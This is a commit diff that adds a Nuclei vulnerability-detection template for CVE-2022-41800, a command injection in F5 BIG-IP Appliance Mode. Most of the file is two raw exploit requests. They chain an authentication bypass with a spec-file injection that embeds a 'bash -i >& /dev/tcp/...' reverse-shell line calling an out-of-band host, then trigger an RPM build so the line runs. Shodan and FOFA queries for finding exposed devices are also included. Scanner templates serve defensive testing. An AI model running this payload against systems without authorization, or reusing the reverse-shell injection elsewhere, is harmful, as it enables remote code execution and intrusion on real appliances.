Merge pull request #11263 from projectdiscovery/CVE-2022-41800

Create CVE-2022-41800.yaml

http/cves/2022/CVE-2022-41800.yaml

@@ -0,0 +1,101 @@
+id: CVE-2022-41800
+
+info:
+  name: F5 BIG-IP Appliance Mode - Command Injection
+  author: dwisiswant0
+  severity: high
+  description: |
+    When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
+  impact: |
+    A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
+  reference:
+    - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
+    - https://support.f5.com/csp/article/K97843387
+    - https://support.f5.com/csp/article/K13325942
+    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
+    - https://nvd.nist.gov/vuln/detail/cve-2022-41800
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 8.7
+    cve-id: CVE-2022-41800
+    cwe-id: CWE-77
+    epss-score: 0.0109
+    epss-percentile: 0.84818
+    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    verified: true
+    vendor: f5
+    product: big-ip_access_policy_manager
+    shodan-query:
+      - http.title:"big-ip®-+redirect" +"server"
+      - http.html:"big-ip apm"
+    fofa-query:
+      - body="big-ip apm"
+      - title="big-ip®-+redirect" +"server"
+    google-query: intitle:"big-ip®-+redirect" +"server"
+  tags: cve,cve2022,rce,f5,bigip,instrusive
+
+variables:
+  auth: "admin:{{rand_text_alpha(1)}}"
+  rand_app: "{{to_lower(rand_text_alpha(6))}}"
+  rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
+  rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
+
+http:
+  - raw:
+      - |
+        POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
+        Host: {{Hostname}}
+        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
+
+        {
+          "specFileData": {
+            "name": "{{rand_app}}",
+            "srcBasePath": "/tmp",
+            "version": "{{rand_ver}}",
+            "release": "{{rand_rel}}",
+            "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
+            "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
+          }
+        }
+
+      - |
+        POST /mgmt/shared/iapp/build-package HTTP/1.1
+        Host: {{Hostname}}
+        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
+
+        {
+          "state": {},
+          "appName": "{{rand_app}}",
+          "packageDirectory": "/tmp",
+          "specFilePath": "{{spec}}",
+          "force": true
+        }
+
+    extractors:
+      - type: json
+        part: body
+        name: spec
+        json:
+          - ".specFilePath"
+        internal: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "RUN_BUILD_RPM_TASK"
+          - "shared:iapp:build-package:buildrpmtaskstate"